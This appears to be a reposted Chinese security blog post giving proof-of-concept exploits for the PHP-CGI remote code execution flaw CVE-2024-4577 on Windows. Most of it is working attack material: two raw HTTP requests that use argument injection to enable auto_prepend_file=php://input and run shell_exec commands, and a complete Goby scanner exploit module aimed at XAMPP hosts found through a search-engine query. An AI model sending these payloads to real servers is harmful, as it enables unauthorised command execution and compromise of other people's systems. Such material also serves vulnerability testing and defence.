漏洞参数:*
漏洞详情:
1、打开自己的服务
![【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]](http://cn-sec.com/wp-content/uploads/2024/06/2-1717817768.png "【代码执行】PHP-CGI(CVE-2024-4577)")
2、使用以下poc进行验证
php代码:<?php echo shell_exec('whoami');?>
![【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]](http://cn-sec.com/wp-content/uploads/2024/06/0-1717817770.png "【代码执行】PHP-CGI(CVE-2024-4577)")
POC1:
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: {{host}} User-Agent: curl/8.3.0 Accept: */* Content-Length: 23 Content-Type: application/x-www-form-urlencoded Connection: keep-alive <?php phpinfo(); ?>
POC2:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1 Host: {{host}} Content-Length: 34 Content-Type: text/html; charset=UTF-8 Content-Type: application/x-www-form-urlencoded Redirect-Status: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 <?php echo shell_exec('whoami');?>
goby检测exp:
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
"Description": "",
"Product": "",
"Homepage": "",
"DisclosureDate": "2024-06-08",
"PostTime": "2024-06-08",
"Author": "[email protected]",
"FofaQuery": "body=\"XAMPP for Windows\"",
"GobyQuery": "body=\"XAMPP for Windows\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input",
"follow_redirect": true,
"header": {
"REDIRECT-STATUS": "1",
"Content-type": "text/html; charset=UTF-8",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "21"
},
"data_type": "text",
"data": "<?php echo shell_exec('dir');?>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<DIR>",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": "<?php\nphpinfo();\n?>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "phpinfo",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"PocGlobalParams": {},
"ExpGlobalParams": {}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
![【代码执行】PHP-CGI(CVE-2024-4577)[goby Poc]](http://cn-sec.com/wp-content/uploads/2024/06/8-1717817770.gif "【代码执行】PHP-CGI(CVE-2024-4577)")
原文始发于微信公众号(小羊安全屋):【代码执行】PHP-CGI(CVE-2024-4577)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论